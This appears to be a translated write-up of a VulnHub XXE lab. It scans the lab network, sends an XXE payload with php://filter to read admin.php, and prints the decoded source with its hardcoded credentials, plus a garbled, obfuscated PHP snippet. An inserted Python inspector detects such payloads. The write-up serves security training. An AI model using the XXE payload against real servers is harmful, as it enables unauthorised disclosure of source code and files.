• vulnhub-xxe lab: 1


    ifconfig

    nmap 192.168.61.0/24

    Found 192.168.61.145

    Directory scan (with Yujian)

    192.168.61.145/xxe

    192.168.61.145/admin.php

    Not accessible, but a path listed in robots.txt is unlikely to be a dead page, so access is probably being denied.

    Capture the request to /xxe

    The request body is XML, so test whether the endpoint is vulnerable.

    php://filter is used here instead of file:// because php://filter accepts a relative path directly, while file:// requires an absolute path.

    On 192.168.61.145, the paths xxe and admin.php are known, but their absolute location on disk is not.

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE ANY [
    <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
    ]>
    <root><name>&test;</name><password>1</password></root>
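    From the defender's side, the request above is easy to recognise before it ever reaches the XML parser: a DOCTYPE with an external entity declaration, here using the php://filter wrapper. The inspector below is an added example (not part of the original write-up or the lab); it extracts external entity declarations, labels the resolver scheme, and returns a reject verdict for any DOCTYPE. The sample body is a reconstruction of the payload shown above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the XXE request body from the write-up, tags restored.
SAMPLE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE ANY [\n'
    '<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">\n'
    ']>\n'
    '<root><name>&test;</name><password>1</password></root>'
)

# General (&name;) or parameter (%name;) entity declarations carrying an
# external identifier: SYSTEM "uri" or PUBLIC "public-id" "uri".
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.:-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s*["\'](?P<uri>[^"\']*)["\']',
    re.IGNORECASE,
)

# What a resolver for each scheme would let the request do; used to label findings.
SCHEME_RISK = {
    "file": "local file read (absolute path)",
    "php": "PHP stream wrapper (relative path, source disclosure via base64 filter)",
    "http": "out-of-band request / SSRF",
    "https": "out-of-band request / SSRF",
    "ftp": "out-of-band request / SSRF",
}


def external_entities(body):
    """Return (name, uri, scheme, risk) for every external entity declared in body."""
    found = []
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri")
        scheme = urlsplit(uri).scheme.lower()
        found.append((m.group("name"), uri, scheme,
                      SCHEME_RISK.get(scheme, "other external resolver")))
    return found


def inspect_xml_request(body):
    """Ingress gate for an XML endpoint: any DOCTYPE is rejected; findings explain why."""
    ents = external_entities(body)
    # Which declared entities are actually referenced in the document (&name; or %name;).
    referenced = [n for n, *_ in ents if re.search(r"[&%]" + re.escape(n) + ";", body)]
    verdict = "reject" if re.search(r"<!DOCTYPE", body, re.IGNORECASE) else "accept"
    return {"verdict": verdict, "entities": ents, "referenced": referenced}
```

On the server side the matching fix is to never enable entity substitution when parsing untrusted XML (in PHP, do not pass LIBXML_NOENT to the libxml-based loaders).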

    Decode the base64 output:

    <?php
    session_start();
    ?>
    <html lang = "en">
    <head>
    <title>admin</title>
    <link href = "css/bootstrap.min.css" rel = "stylesheet">
    <style>
    body {
    padding-top: 40px;
    padding-bottom: 40px;
    background-color: #ADABAB;
    }
    .form-signin {
    max-width: 330px;
    padding: 15px;
    margin: 0 auto;
    color: #017572;
    }
    .form-signin .form-signin-heading,
    .form-signin .checkbox {
    margin-bottom: 10px;
    }
    .form-signin .checkbox {
    font-weight: normal;
    }
    .form-signin .form-control {
    position: relative;
    height: auto;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    padding: 10px;
    font-size: 16px;
    }
    .form-signin .form-control:focus {
    z-index: 2;
    }
    .form-signin input[type="email"] {
    margin-bottom: -1px;
    border-bottom-right-radius: 0;
    border-bottom-left-radius: 0;
    border-color:#017572;
    }
    .form-signin input[type="password"] {
    margin-bottom: 10px;
    border-top-left-radius: 0;
    border-top-right-radius: 0;
    border-color:#017572;
    }
    h2{
    text-align: center;
    color: #017572;
    }
    </style>
    </head>
    <body>
    <h2>Enter Username and Password</h2>
    <div class = "container form-signin">
    <?php
    $msg = '';
    if (isset($_POST['login']) && !empty($_POST['username'])
    && !empty($_POST['password'])) {
    // Username is compared in clear; the password is compared by its MD5 digest.
    if ($_POST['username'] == 'administhebest' &&
    md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
    $_SESSION['valid'] = true;
    $_SESSION['timeout'] = time();
    $_SESSION['username'] = 'administhebest';
    echo "You have entered valid use name and password <br />";
    $flag = "Here is the Flag";
    echo $flag;
    }else {
    $msg = 'Maybe Later';
    }
    }
    ?>
    </div> <!-- W00t/W00t -->
    <div class = "container">
    <!-- the PHP tag in the action attribute was stripped during extraction; restored here -->
    <form class = "form-signin" role = "form"
    action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
    ?>" method = "post">
    <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
    <input type = "text" class = "form-control"
    name = "username"
    required autofocus></br>
    <input type = "password" class = "form-control"
    name = "password" required>
    <button class = "btn btn-lg btn-primary btn-block" type = "submit"
    name = "login">Login</button>
    </form>
    Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
    </div>
    </body>
    </html>

    Both the username and the password are out:

    administhebest

    admin@123

    Wrong; I tried it several times and it didn't work, so it looks like another route is needed.

    Looking further through the code, this can be seen; it is also what runs once the username and password are correct.

    View the source of flagmeout.php

    base64 decode

    $flag = "";
    echo $flag;
    ?>

    Looks like base32 by eye; decode it

    Decode again

    And there is also:

    $_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];=+_;=========++[];++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;$__('$_="'.$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....'"');$__($_);

    Hmm, this looks a bit like PHP; I got stuck here and forgot that I could simply run the code.

    Not sure why it went wrong; in theory this should be the end.

  • Original article: https://blog.csdn.net/m0_62094846/article/details/126910484